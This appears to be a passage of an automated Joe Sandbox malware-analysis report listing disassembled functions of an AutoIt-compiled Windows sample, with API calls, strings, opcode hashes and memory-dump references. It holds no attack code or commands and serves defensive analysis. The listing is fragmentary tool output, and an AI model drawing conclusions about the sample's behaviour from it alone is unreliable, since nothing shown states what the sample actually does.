                                                            • Opcode ID: 512f5274584c0ef8357fa15acad11a6bc222d8a3d3c522dd3d25baa8aeee2602
                                                            • Instruction ID: e326dfe71493e478e636e5a793ae48cbf5fd9abe1aea3a4f4335f7ec9068b07a
                                                            • Opcode Fuzzy Hash: 512f5274584c0ef8357fa15acad11a6bc222d8a3d3c522dd3d25baa8aeee2602
                                                            • Instruction Fuzzy Hash: 78319072210219BADB109FB4DC48AFB73B9FF49720F108519F9A587190DB31ACA1CB60
                                                            Function 00202D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202E00
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00202E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 1d7fc8fb5c5037ffd4dbbaa76243ee37a9e430a02de9c85ecca7a3fe9d6ee201
                                                            • Instruction ID: c1f0e78626c832e815716e0ad3994064c90be76405c8284c9ac5ec465da064aa
                                                            • Opcode Fuzzy Hash: 1d7fc8fb5c5037ffd4dbbaa76243ee37a9e430a02de9c85ecca7a3fe9d6ee201
                                                            • Instruction Fuzzy Hash: FC31F731A50306EBEB248F58D84DB9EBBB9FF05340F14406FE985A61E2D770A968CB50
                                                            Function 00226943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002269D0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002269DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: f786361da6664f67becd352393a6ed905e6efd4a2bccafa66bc3d6418b91758d
                                                            • Instruction ID: 588cd756fb121d57bd030dc7ca418a03cee59af8bd04b1be81c8276bcb0a4306
                                                            • Opcode Fuzzy Hash: f786361da6664f67becd352393a6ed905e6efd4a2bccafa66bc3d6418b91758d
                                                            • Instruction Fuzzy Hash: 13110B7232011A7FEF119F94DC84EFB376EEB45354F100124F95897290DA719CA187A0
                                                            Function 00226E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
                                                              • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
                                                              • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00226EE0
                                                            • GetSysColor.USER32(00000012), ref: 00226EFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: d6af94071a3df5ec5f523fbb2b5969c4fa65590a65e7eae23fc187d573b39098
                                                            • Instruction ID: 46fb1caea0c517cef3181c99c20d1ce3ac2bad7dd78b446784dc4db4711e0076
                                                            • Opcode Fuzzy Hash: d6af94071a3df5ec5f523fbb2b5969c4fa65590a65e7eae23fc187d573b39098
                                                            • Instruction Fuzzy Hash: 1521477262021ABFDB04DFE8ED49EEA7BB8EB08314F104628F955D2250D774A8619B50
                                                            Function 00226B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00226C11
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00226C20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 0bcfe80041a8cac7a5854da5bdf85bfa39bfb9007618bb555b70205653d74261
                                                            • Instruction ID: c4bb891a6d3bf7e7f8758e5e607ba74fb6e88c77071c4234a407aa350012d67f
                                                            • Opcode Fuzzy Hash: 0bcfe80041a8cac7a5854da5bdf85bfa39bfb9007618bb555b70205653d74261
                                                            • Instruction Fuzzy Hash: 7B11DD72120119BBEB205EA4AC49AFA3769EB05378F604724F960E71E0C775DCA19B20
                                                            Function 00202E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202F11
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00202F30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 7d0d7b8c88527129bb62d6f149571cbec74c070065872401577db909cb400920
                                                            • Instruction ID: 506866a77c26164a17291d2b7b8c1c20d5493f264b02b5a9922d334a4c04e05a
                                                            • Opcode Fuzzy Hash: 7d0d7b8c88527129bb62d6f149571cbec74c070065872401577db909cb400920
                                                            • Instruction Fuzzy Hash: CE11BE32921316EBCB21DE98DC0CB9973B9AB01350F1440A6FC54A72E2D7B0AD288791
                                                            Function 002124CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00212520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00212549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 1d599e1622dadf060d841fb8fd9bd506a76fe334fd9e0accf5a961a75318e263
                                                            • Instruction ID: 13d0f34dd3bcb0c5f690ddfedf265557dde2f7599b999e93fff25184c0cf1502
                                                            • Opcode Fuzzy Hash: 1d599e1622dadf060d841fb8fd9bd506a76fe334fd9e0accf5a961a75318e263
                                                            • Instruction Fuzzy Hash: 9A11E370121226FADB288F518CD9EFBFFA9FB26351F50812AF90546040D2B059B9D6E0
                                                            Function 002180A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0021830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002180C8,?,00000000,?,?), ref: 00218322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00218108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 95562144c1566f016609d1583f3cb85f5a74fbc96e45d76711cb36b53c5a59a4
                                                            • Instruction ID: d056605630fb2f0088338a861a1890d379111bdd8ad6f10a021bf40144416804
                                                            • Opcode Fuzzy Hash: 95562144c1566f016609d1583f3cb85f5a74fbc96e45d76711cb36b53c5a59a4
                                                            • Instruction Fuzzy Hash: 7511E575610209ABCB20AF64CC86FFDB3B4FF24320F108526F91597291DB71A865C655
                                                            Function 001B0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001A3C26,002662F8,?,?,?), ref: 001B0ACE
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • _wcscat.LIBCMT ref: 001E50E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: c&
                                                            • API String ID: 257928180-2028742917
                                                            • Opcode ID: 2e5bbfed4e6578dda3a27a8c1aa60b5c2463368b831be3e27d60506118709d38
                                                            • Instruction ID: bc5b436e4479f580b11bca31f208335fecb5dbc00916d9c83f7262d22af489e8
                                                            • Opcode Fuzzy Hash: 2e5bbfed4e6578dda3a27a8c1aa60b5c2463368b831be3e27d60506118709d38
                                                            • Instruction Fuzzy Hash: 3811A13990420CAB8B51EBA4DD06EDE77B9EF1C750F0040E6F988D7281EB70DB948B51
                                                            Function 001F92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001F9355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 01437a71ff5941c0f64e9abd1e8a83786a127ec301413fdb466d43b0c6f605cf
                                                            • Instruction ID: 2051eaa65beea14aaaba33b560ee8ee2b001550b3e08bfd4aee1184abab08f23
                                                            • Opcode Fuzzy Hash: 01437a71ff5941c0f64e9abd1e8a83786a127ec301413fdb466d43b0c6f605cf
                                                            • Instruction Fuzzy Hash: C401DEB5A45218AB8B08FBA4CC91DFE7369BF16320B100619BA32572D2EB31591C8660
                                                            Function 001F91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 001F924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: e7694b292c734cb05e3e5005ee18416e57f66056de42866e4fab3770887a9569
                                                            • Instruction ID: f2862a3425d45765128d518c7bc3aaca5b877035f308cbcf97ea1be8f44b9d9c
                                                            • Opcode Fuzzy Hash: e7694b292c734cb05e3e5005ee18416e57f66056de42866e4fab3770887a9569
                                                            • Instruction Fuzzy Hash: 12018875A452087BCB14F7A0C992EFF73AC9F56300F1400157A12671C2EB155F1C9671
                                                            Function 001F9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 001F92D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 17cce26e31aad051e15ec4b485ceaab417e37256466db88f0650b681abde02aa
                                                            • Instruction ID: b4c96da6a27d09dc173180096bb119aadf14cd548646a2f3a644154e823b84d6
                                                            • Opcode Fuzzy Hash: 17cce26e31aad051e15ec4b485ceaab417e37256466db88f0650b681abde02aa
                                                            • Instruction Fuzzy Hash: 2D01A775A452087BCF14F7A4C992EFF77AC9F22340F5401157912631C2EB215F1C9675
                                                            Function 001C6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: @R&
                                                            • API String ID: 3494438863-3579571961
                                                            • Opcode ID: 665af2bc0e51346531c5afbeb5fa6532a8c2e15c66197fe8345fcb1be7484f3e
                                                            • Instruction ID: 57f1063aee229fbdce23edb339fb623a1d10cc3e5fea6823b438fafb6bd017d8
                                                            • Opcode Fuzzy Hash: 665af2bc0e51346531c5afbeb5fa6532a8c2e15c66197fe8345fcb1be7484f3e
                                                            • Instruction Fuzzy Hash: 82F06271308716ABF728CF98FD69FA52795E730720F10842FE941CB594EBB0C8818685
                                                            Function 002051CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: b22587baa0e73811c8b41bed591cfc8019dfcbea8c1887d44be9148fd71d5bae
                                                            • Instruction ID: d643d60906393f61d3c62e1d06851232e86f4458beeb7a604632f3c24a46cfc2
                                                            • Opcode Fuzzy Hash: b22587baa0e73811c8b41bed591cfc8019dfcbea8c1887d44be9148fd71d5bae
                                                            • Instruction Fuzzy Hash: 16E02232A003292AE320AA99AC0AFA7F7ACEF55721F00016AFD10D3041E6609A158BE1
                                                            Function 001F81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001F81CA
                                                              • Part of subcall function 001C3598: _doexit.LIBCMT ref: 001C35A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 8351f83f7f2949954411bf9d6e94bce55d099468274e9ea693184c580b304c81
                                                            • Instruction ID: 93c56595579c0e4a8b8f079b55a74090d1ec7542d30c01f48a4be5254f742de0
                                                            • Opcode Fuzzy Hash: 8351f83f7f2949954411bf9d6e94bce55d099468274e9ea693184c580b304c81
                                                            • Instruction Fuzzy Hash: E3D012322D535836D21432A46D0AFD965484B26B52F104426BB08555D38BE199E24299
                                                            Function 001DB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001DB564: _memset.LIBCMT ref: 001DB571
                                                              • Part of subcall function 001C0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001DB540,?,?,?,001A100A), ref: 001C0B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,001A100A), ref: 001DB544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001A100A), ref: 001DB553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001DB54E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 423d7b803e89830f8526cb239cca4f9ca68bd2761bcedd19e95c624c0b8bc1a9
                                                            • Instruction ID: fef0627027d47d6fc1a5d47b2ffb1c7b50b27414f17ad2b52108b22251e3811c
                                                            • Opcode Fuzzy Hash: 423d7b803e89830f8526cb239cca4f9ca68bd2761bcedd19e95c624c0b8bc1a9
                                                            • Instruction Fuzzy Hash: B0E06D74604350CFD365DF69F6487427BE0AB15754F018A2DF846C6350D7B4E809CBA1